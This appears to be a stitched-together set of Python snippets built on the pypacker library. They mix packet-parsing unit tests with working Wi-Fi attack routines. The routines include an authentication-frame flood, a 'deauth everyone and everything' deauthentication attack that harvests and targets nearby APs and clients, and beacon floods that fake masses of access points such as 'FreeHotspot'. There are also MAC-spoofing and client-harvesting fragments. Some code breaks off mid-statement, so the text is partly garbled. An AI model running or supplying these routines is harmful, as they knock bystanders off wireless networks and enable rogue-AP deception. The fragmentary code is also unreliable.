def test_radiotap_packet_filter_and_parse_parsing_wrong_encapsulation(
marine_or_marine_pool: Union[Marine, MarinePool]
):
src_ip = "78.78.78.255"
dst_ip = "10.0.0.255"
expected_output = {
"radiotap.present.tsft": None,
"radiotap.present.channel": None,
"radiotap.present.rate": None,
"wlan.fc.type_subtype": None,
"llc.type": None,
"ip.src": None,
"ip.dst": None,
}
packet = (
radiotap.Radiotap(present_flags=radiotap.CHANNEL_MASK + radiotap.RATE_MASK)
+ ieee80211.IEEE80211(framectl=0x8801)
+ ieee80211.IEEE80211.Dataframe(sec_param=None)
+ llc.LLC(
dsap=170, ssap=170, ctrl=3, snap=int.to_bytes(llc.LLC_TYPE_IP, 5, "big")
)
+ ip.IP(src_s=src_ip, dst_s=dst_ip)
)
general_filter_and_parse_test(
marine_or_marine_pool=marine_or_marine_pool,
packet=packet.bin(),
packet_encapsulation=encap_consts.ENCAP_ETHERNET,
bpf_filter=None,
display_filter=None,
field_templates=None,
expected_passed=True,
expected_output=expected_output,
)
def test_radiotap_packet_filter_and_parse_with_auto_encap_in_field_template(
marine_or_marine_pool: Union[Marine, MarinePool]
):
src_ip = "78.78.78.255"
dst_ip = "10.0.0.255"
bpf_filter = "ip"
display_filter = "ip"
field_templates = {"macro.dummy": ["radiotap.present.rate"]}
expected_output = {
"macro.dummy": 1,
"ip.src": src_ip,
"ip.dst": dst_ip,
}
packet = (
radiotap.Radiotap(present_flags=radiotap.CHANNEL_MASK + radiotap.RATE_MASK)
+ ieee80211.IEEE80211(framectl=0x8801)
+ ieee80211.IEEE80211.Dataframe(sec_param=None)
+ llc.LLC(
dsap=170, ssap=170, ctrl=3, snap=int.to_bytes(llc.LLC_TYPE_IP, 5, "big")
)
+ ip.IP(src_s=src_ip, dst_s=dst_ip)
)
general_filter_and_parse_test(
marine_or_marine_pool=marine_or_marine_pool,
packet=packet.bin(),
packet_encapsulation=None,
bpf_filter=bpf_filter,
display_filter=display_filter,
field_templates=field_templates,
expected_passed=True,
expected_output=expected_output,
)
def wifi_authdos_cb(pargs):
"""
Authentication frames DoS
"""
radiotap_ieee80211 = radiotap.Radiotap() + \
ieee80211.IEEE80211(type=ieee80211.MGMT_TYPE, subtype=ieee80211.M_AUTH, to_ds=0, from_ds=0)
auth = ieee80211.IEEE80211.Auth(dst_s=pargs.mac_dst, bssid_s=pargs.mac_dst)
radiotap_ieee80211_auth = radiotap_ieee80211 + auth
psock_send = psocket.SocketHndl(iface_name=pargs.iface_name,
mode=psocket.SocketHndl.MODE_LAYER_2)
channel = int(pargs.channels.split(",")[0])
logger.debug("sending %d deauth to %r on channel %d", pargs.count,
pargs.mac_dst, channel)
utils.switch_wlan_channel(pargs.iface_name,
int(pargs.channels.split(",")[0]))
for cnt in range(pargs.count):
if cnt & 15 == 0:
print(".", end="")
sys.stdout.flush()
auth.src = pypacker.get_rnd_mac()
try:
psock_send.send(radiotap_ieee80211_auth.bin())
except socket.timeout:
# timeout on sending? that's ok
pass
print("")
psock_send.close()
def test_radiotap_packet_filter_and_parse_failing_wrong_encapsulation(
marine_or_marine_pool: Union[Marine, MarinePool]
):
src_ip = "78.78.78.255"
dst_ip = "10.0.0.255"
bpf_filter = "ip"
display_filter = "ip"
packet = (
radiotap.Radiotap(present_flags=radiotap.CHANNEL_MASK + radiotap.RATE_MASK)
+ ieee80211.IEEE80211(framectl=0x8801)
+ ieee80211.IEEE80211.Dataframe(sec_param=None)
+ llc.LLC(
dsap=170, ssap=170, ctrl=3, snap=int.to_bytes(llc.LLC_TYPE_IP, 5, "big")
)
+ ip.IP(src_s=src_ip, dst_s=dst_ip)
)
general_filter_and_parse_test(
marine_or_marine_pool=marine_or_marine_pool,
packet=packet.bin(),
packet_encapsulation=encap_consts.ENCAP_ETHERNET,
bpf_filter=bpf_filter,
display_filter=display_filter,
field_templates=None,
expected_passed=False,
expected_output={},
)
def show_pcap(fname, cnt=1000):
"""
Read cnt packets from a pcap file, default: 1000
"""
f = open(fname, "rb")
pcap = ppcap.Reader(f)
cnt = 0
for ts, buf in pcap:
cnt += 1
"""
if cnt > 1:
continue
"""
print(">>> read packet %d" % cnt)
rt = radiotap.Radiotap(buf)
print("%r" % rt)
print("%r" % rt.ieee80211)
try:
print("%r" % rt.ieee80211.dataframe)
except:
try:
print("%r" % rt.ieee80211.assocreq)
except:
try:
print("%r" % rt.ieee80211.beacon)
except:
try:
print("%r" % rt.ieee80211.proberesp)
except:
try:
print("%r" % rt.ieee80211.probereq)
except:
print("%r" % rt.ieee80211.assocresp)
f.close()
from pypacker import psocket
from pypacker.layer12 import ieee80211, radiotap
import time
wlan_monitor_if = "wlan1"
wlan_reader = psocket.SocketHndl(iface_name=wlan_monitor_if, timeout=999)
print("please wait for wlan traffic to show up")
aps_found = {}
time_start = time.time()
for i in range(100000):
raw_bytes = wlan_reader.recv()
drvinfo = radiotap.Radiotap(raw_bytes)
if i % 1000 == 0:
print("packets/s: %d" % (i / (time.time() - time_start)))
try:
beacon = drvinfo[ieee80211.IEEE80211.Beacon]
if beacon is None:
continue
mac_ap = beacon.src1_s
# print(beacon)
ie_ssid = beacon.params[0].data
# signal = 0xffffffff ^ drvinfo.dids[3].value
linktype=ppcap.DLT_IEEE802_11_RADIO)
# pcapwriter = ppcap.Writer(filename="parsefail.pcap")
raw_bytes = b""
cnt = 0
time_start = time.time()
while True:
if cnt % 1000 == 0:
print("%d pps" % (cnt / (time.time() - time_start)))
cnt = 0
time_start = time.time()
cnt += 1
try:
raw_bytes = sockhndl.recv()
pkt = radiotap.Radiotap(raw_bytes)
# pkt = ethernet.Ethernet(raw_bytes)
# pkt = linuxcc.LinuxCC(raw_bytes)
# print(pkt)
# print(pkt.body_handler)
if pkt[ip.IP] is not None:
tmp = pkt[ip.IP].src_s
tmp = pkt[ip.IP].dst_s
tmp = pkt[ip.IP].body_handler.body_handler
pkt.dissect_full()
raw_bytes = pkt.bin()
# pcapwriter.write(raw_bytes)
except socket.timeout:
pass
from pypacker.layer12 import radiotap, ieee80211
from pypacker import psocket
# name of monitor interface to use
wlan_monitor_if = sys.argv[1]
# MAC address of access point
ap_mac = sys.argv[2]
print("interface/ap: %s %s" % (wlan_monitor_if, ap_mac))
utils.set_wlan_monmode(wlan_monitor_if, monitor_active=False, reactivate=False)
utils.set_ethernet_address(wlan_monitor_if, "24:77:03:01:5C:8D")
utils.set_wlan_monmode(wlan_monitor_if, monitor_active=True)
psocket = psocket.SocketHndl(wlan_monitor_if)
auth_req_orig = radiotap.Radiotap() +\
ieee80211.IEEE80211(type=ieee80211.MGMT_TYPE, subtype=ieee80211.M_AUTH, to_ds=0, from_ds=0) +\
ieee80211.IEEE80211.Auth(dst_s=ap_mac, bssid_s=ap_mac)
beacon_orig = radiotap.Radiotap() +\
ieee80211.IEEE80211(type=ieee80211.MGMT_TYPE, subtype=ieee80211.M_BEACON, to_ds=0, from_ds=0) +\
ieee80211.IEEE80211.Beacon(
params=[ieee80211.IEEE80211.IE(id=0, len=10, body_bytes=b"\x00" * 10),
ieee80211.IEEE80211.IE(id=1, len=8, body_bytes=b"\x82\x84\x8b\x96\x0c\x12\x18\x24"),
ieee80211.IEEE80211.IE(id=3, len=1, body_bytes=b"\x04"),
ieee80211.IEEE80211.IE(id=5, len=4, body_bytes=b"\x00\x01\x00\x00"),
ieee80211.IEEE80211.IE(id=0x2A, len=1, body_bytes=b"\x00")]
)
def send_auth(mac):
"""Send authentications to ap having mac 'mac'"""
def harvest(psock, mode, aps=None, known_clients=None, harvest_time_ch=5):
"""
harvest_time_ch -- time to harvest per channel in seconds
return -- set(ap_mac | client_macs)
"""
found = set()
for channel in channels:
utils.switch_wlan_channel(psock.iface_name, channel)
print("setting channel: %d" % channel)
time_start = time.time()
clients_seen = {}
cnt = 0
# TODO: to be tuned
while (time.time() - time_start) < harvest_time_ch:
try:
try:
raw_bytes = psock.recv()
except:
# assume timeout: switch channel
break
cnt += 1
drvinfo = radiotap.Radiotap(raw_bytes)
if cnt % 1000 == 0:
print("packets/s: %d" % (cnt / (time.time() - time_start)))
if mode == HARVEST_MODE_AP:
beacon = drvinfo[ieee80211.IEEE80211.Beacon]
if beacon is None:
continue
if beacon.bssid_s not in found:
logger.info(
"found AP: %18s %-40s %-10s" %
(beacon.bssid_s,
utils.get_vendor_for_mac(
beacon.bssid_s[0:8]), beacon.params[0].data))
found.add(beacon.bssid_s)
elif mode == HARVEST_MODE_CLIENT:
dataframe = drvinfo[ieee80211.IEEE80211.Dataframe]
if dataframe is None:
continue
src = dataframe.src_s
if src in aps:
# not interested in aps
continue
if src not in found:
logger.info("found new client: %s" % src)
found.add(src)
elif mode == HARVEST_MODE_CLIENT_LIST:
try:
src = drvinfo[ieee80211.IEEE80211]._body_handler.src_s
if src in known_clients:
# TODO: signal strength
# print(src)
found.add(src)
except AttributeError as e:
pass
# print(e)
except Exception as e:
print(e)
for k in found:
# os.system("clear")
print("%s -> (%r)" % (k, str(known_clients[k])))
else:
print("wrong harvest mode")
return None
except Exception as e:
print(e)
return found
def wifi_deauth_cb(pargs):
"""
Deauth everyone and everything
"""
if pargs.channels is not None:
channels = [int(channel) for channel in pargs.channels.split(",")]
else:
channels = utils.get_available_wlan_channels(pargs.iface_name)
logger.debug("using channels: %r", channels)
psock_rcv = psocket.SocketHndl(iface_name=pargs.iface_name,
mode=psocket.SocketHndl.MODE_LAYER_2,
timeout=1)
psock_send = psocket.SocketHndl(iface_name=pargs.iface_name,
mode=psocket.SocketHndl.MODE_LAYER_2)
# {channel : {b"AP" : set(b"clients", ...)}}
wdata = collections.defaultdict(lambda: collections.defaultdict(set))
# thread: socket1: listen for traffic, extract ap/client macs
def listen_cycler(pargs_ref):
while pargs_ref.is_running:
try:
rtap = psock_rcv.recvp(lowest_layer=radiotap.Radiotap)[0]
except (IndexError, socket.timeout, OSError):
logger.debug("no packets received..")
continue
try:
pkt_ieee80211 = rtap.ieee80211
except Exception as ex:
logger.warning(ex)
# TODO: use channel info from radiotap?
if pkt_ieee80211.is_beacon():
bssid = pkt_ieee80211.beacon.bssid
if bssid in pargs.macs_excluded:
#logger.debug("excluding AP: %r", bssid)
continue
# don't overwrite already stored client MACs
if bssid not in wdata[pargs.current_channel]:
# logger.debug("new AP: %r %s", bssid, utils.get_vendor_for_mac(bssid))
wdata[pargs.current_channel][bssid] = set()
for client in pkt_ieee80211.extract_client_macs():
bssid = pkt_ieee80211.upper_layer.bssid
if bssid in pargs.macs_excluded:
#logger.debug("excluding AP: %r", bssid)
continue
if client in pargs.macs_excluded or\
client in wdata[pargs.current_channel][bssid]:
#logger.debug("excluding client: %r", bssid)
continue
# logger.debug("new client: %r %s", client, utils.get_vendor_for_mac(client))
wdata[pargs.current_channel][bssid].add(client)
pargs.is_running = True
pargs.current_channel = channels[0]
layer_radiotap = radiotap.Radiotap()
layer_iee80211 = ieee80211.IEEE80211(type=ieee80211.MGMT_TYPE,
subtype=ieee80211.M_DEAUTH)
layer_deauth = ieee80211.IEEE80211.Deauth()
pkt_deauth = layer_radiotap + layer_iee80211 + layer_deauth
thread_listen = threading.Thread(target=listen_cycler, args=[pargs])
thread_listen.start()
logger.info("first round slow start..")
for cnt in range(pargs.count):
seq = 0
layer_deauth.seq = seq
if not pargs.is_running:
break
for channel in channels:
# skip non-traffic channels
if cnt > 0 and len(wdata[channel]) == 0:
#logger.debug("skipping channel %d", channel)
continue
utils.switch_wlan_channel(pargs.iface_name, channel)
pargs.current_channel = channel
try:
time.sleep(0.4 if cnt == 0 else 0.05)
except KeyboardInterrupt:
pargs.is_running = False
break
logger.info(
"deauth on channel %3d (%3d APs, %3d clients, round %4d)",
channel, len(wdata[channel]),
sum(len(clients) for ap, clients in wdata[channel].items()),
cnt)
# TODO: quite slow
aps = list(wdata[channel].keys())
for mac_ap, macs_clients in [[ap, wdata[channel][ap]]
for ap in aps]:
layer_deauth.seq += 1
layer_deauth.src = mac_ap
layer_deauth.bssid = mac_ap
if not pargs.nobroadcast:
# reset src/dst for broadcast
layer_deauth.dst = b"\xFF" * 6
# TODO: increase?
# logger.debug("deauth AP: %r", mac_ap)
for _ in range(5):
layer_deauth.seq += 1
psock_send.send(pkt_deauth.bin())
for mac_client in list(macs_clients):
# logger.debug("deauth client: %r", mac_client)
layer_deauth.dst = mac_client
for _ in range(2):
layer_deauth.seq += 1
psock_send.send(pkt_deauth.bin())
psock_send.close()
psock_rcv.close()
def wifi_ap_ie_cb(pargs):
"""
Create fake APs using various IEs
"""
if pargs.channels is not None:
channels = [int(channel) for channel in pargs.channels.split(",")]
else:
channels = utils.get_available_wlan_channels(pargs.iface_name)
beacon_orig = radiotap.Radiotap() + \
ieee80211.IEEE80211(type=ieee80211.MGMT_TYPE, subtype=ieee80211.M_BEACON, to_ds=0, from_ds=0) + \
ieee80211.IEEE80211.Beacon(
dst=b"\xFF\xFF\xFF\xFF\xFF\xFF",
src=b"\xFF\xFF\xFF\xFF\xFF\xFF",
params=[ieee80211.IEEE80211.IE(id=0, len=10, body_bytes=b"\x00" * 10),
ieee80211.IEEE80211.IE(id=1, len=8, body_bytes=b"\x82\x84\x8b\x96\x0c\x12\x18\x24"),
ieee80211.IEEE80211.IE(id=3, len=1, body_bytes=b"\x04"),
ieee80211.IEEE80211.IE(id=5, len=4, body_bytes=b"\x00\x01\x00\x00"),
ieee80211.IEEE80211.IE(id=0x2A, len=1, body_bytes=b"\x00"),
ieee80211.IEEE80211.IE(id=0x00, len=255, body_bytes=b"\x00"*16),
]
)
beacon = copy.deepcopy(beacon_orig)
_beacon = beacon[ieee80211.IEEE80211.Beacon]
mac = pypacker.get_rnd_mac()
essid = "012"
_beacon.src = mac
_beacon.bssid = mac
_beacon.params[0].body_bytes = bytes(essid, "ascii")
_beacon.params[0].len = len(essid)
_beacon.params[2].body_bytes = pack_B(channels[0])
_beacon.seq = 0
# adaptive sleeptime due to full buffer on fast sending
sleeptime = 0.000001
pargs.is_running = True
logger.info("faking APs on the following channels %r", channels)
psock_send = psocket.SocketHndl(iface_name=pargs.iface_name,
mode=psocket.SocketHndl.MODE_LAYER_2)
ie_cnt = 0
pkt_cnt = 0
PACKETS_PER_CHANNEL = 3
for _ in range(pargs.count):
if not pargs.is_running:
break
for channel in channels:
if pkt_cnt % (256) == 0:
print("%d packets sent, ch: %d \r" % (pkt_cnt, channel),
end="")
sys.stdout.flush()
_beacon.params[2].body_bytes = pack_B(channel)
utils.switch_wlan_channel(pargs.iface_name, channel)
#logger.info("AP on channel %d: %s", channel, _beacon.params[0].body_bytes)
pkt_cnt += 256
try:
for ie_id in range(256):
_beacon.params[5].id = ie_id
mac = pypacker.get_rnd_mac()
_beacon.src = mac
_beacon.bssid = mac
_beacon.params[0].body_bytes = get_random_essid()
_beacon.params[0].len = len(_beacon.params[0].body_bytes)
for _ in range(PACKETS_PER_CHANNEL):
_beacon.seq = ie_id
# _beacon.ts = x << (8*7)
_beacon.ts = ie_id * 20
# time.sleep(0.01)
psock_send.send(beacon.bin())
time.sleep(sleeptime)
except socket.timeout:
# timeout on sending? that's ok
pass
except OSError:
sleeptime *= 10
print()
logger.warning(
"buffer full, new sleeptime: %03.6fs, waiting...",
sleeptime)
time.sleep(1)
ie_cnt = (ie_cnt + 1) & 0xFF
psock_send.close()
def wifi_ap_cb(pargs):
"""
Create a massive amount of fake APs
"""
if pargs.channels is not None:
channels = [int(channel) for channel in pargs.channels.split(",")]
else:
channels = utils.get_available_wlan_channels(pargs.iface_name)
beacon_orig = radiotap.Radiotap() + \
ieee80211.IEEE80211(type=ieee80211.MGMT_TYPE, subtype=ieee80211.M_BEACON, to_ds=0, from_ds=0) + \
ieee80211.IEEE80211.Beacon(
dst=b"\xFF\xFF\xFF\xFF\xFF\xFF",
src=b"\xFF\xFF\xFF\xFF\xFF\xFF",
params=[ieee80211.IEEE80211.IE(id=0, len=10, body_bytes=b"\x00" * 10),
ieee80211.IEEE80211.IE(id=1, len=8, body_bytes=b"\x82\x84\x8b\x96\x0c\x12\x18\x24"),
ieee80211.IEEE80211.IE(id=3, len=1, body_bytes=b"\x04"),
ieee80211.IEEE80211.IE(id=5, len=4, body_bytes=b"\x00\x01\x00\x00"),
ieee80211.IEEE80211.IE(id=0x2A, len=1, body_bytes=b"\x00")])
beacon = copy.deepcopy(beacon_orig)
_beacon = beacon[ieee80211.IEEE80211.Beacon]
mac = pypacker.get_rnd_mac()
essid = "FreeHotspot"
_beacon.src = mac
_beacon.bssid = mac
_beacon.params[0].body_bytes = bytes(essid, "ascii")
_beacon.params[0].len = len(essid)
_beacon.params[2].body_bytes = pack_B(channels[0])
_beacon.seq = 0
_beacon.interval = 0xFFFF
# adaptive sleeptime due to full buffer on fast sending
sleeptime = 0.000001
rand_mac = True
rand_essid = True
pargs.is_running = True
logger.info("faking APs on the following channels %r", channels)
psock_send = psocket.SocketHndl(iface_name=pargs.iface_name,
mode=psocket.SocketHndl.MODE_LAYER_2)
cnt = 0
rounds = 0
PACKETS_PER_CHANNEL = 3
starttime = time.time()
_beacon.params[2].body_bytes = pack_B(channels[0])
utils.switch_wlan_channel(pargs.iface_name, channels[0])
for _ in range(pargs.count):
if not pargs.is_running:
break
if cnt & 0xF == 0:
print("%d packets sent\r" % (cnt * PACKETS_PER_CHANNEL), end="")
sys.stdout.flush()
if time.time() - starttime > 60:
rounds += 1
cnt = 0
cnt_bts = unpack_I(cnt)[0][-3:]
cnt += 1
if rand_mac:
mac = pypacker.get_rnd_mac()[:3] + cnt_bts
_beacon.src = mac
_beacon.bssid = mac
if rand_essid:
_beacon.params[0].body_bytes = get_random_essid()[:-3] + cnt_bts
_beacon.params[0].len = len(_beacon.params[0].body_bytes)
try:
_beacon.seq = 1000 + rounds * PACKETS_PER_CHANNEL
_beacon.ts = 2000 + rounds * 0x100 * PACKETS_PER_CHANNEL
for cnt_ap in range(PACKETS_PER_CHANNEL):
# send multiple beacons for every ap
psock_send.send(beacon.bin())
_beacon.seq += 1
_beacon.ts += 0x100
#time.sleep(sleeptime)
except socket.timeout:
# timeout on sending? that's ok
pass
except OSError:
sleeptime *= 10
print()
logger.warning("buffer full, new sleeptime: %03.6fs, waiting...",
sleeptime)
time.sleep(1)
psock_send.close()
